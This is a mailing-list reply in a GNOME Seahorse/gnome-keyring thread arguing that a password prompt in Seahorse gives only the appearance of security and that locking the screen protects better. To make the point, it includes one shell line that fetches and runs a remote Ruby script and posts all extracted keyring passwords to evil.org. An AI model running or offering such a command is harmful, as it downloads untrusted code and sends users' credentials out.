On Mon, 13 Dec 2010 17:59:52 +0200, Yaron Sheffer <yaronf gmx com> wrote:

> Seahorse is available on many machines, and any snoop can come by and
> view the passwords. What Karl is suggesting (I believe) is that the
> Seahorse *application* should require the login (or keyring?)
> password to be entered, even though as an application, it already has
> access to the passwords.
>
> I agree with Karl that this would provide real security benefit, even
> though a smarter attacker, or one who has more time, can install
> another application and access the same secrets.

Sorry, but it sounds like snake oil if Seahorse asks for a password. It doesn't make the system more secure. This only seems like more security.

Of course it's possible to ask for some password, but there are enough other ways to access the passwords.

In my opinion there are two options:

* Leave everything open and lock the screen every time
* Ask for a password on _every query_ of _every application_. But this makes you type passwords all the time. The applications should not cache the password for security reasons (e.g. locked memory). So you have to retype your "master" password every time your email program queries the server for new emails, every time you change the network, every time ...

If somebody doesn't believe me how easy it is to access all passwords, I attached a short script. It takes only seconds to extract all passwords:

    ruby -e "$(curl http://evil.org/discoverall.rb )" | curl -d @- http://evil.org/receive_passwords.php

In my opinion the user should learn to lock their screen if they don't trust their environment. Gnome-keyring has many options to protect passwords, e.g. automatic locking after some time. This can really improve security, in contrast to blocking some text fields with a password.

Florian
Attachment:
discoverall.rb
Description: application/ruby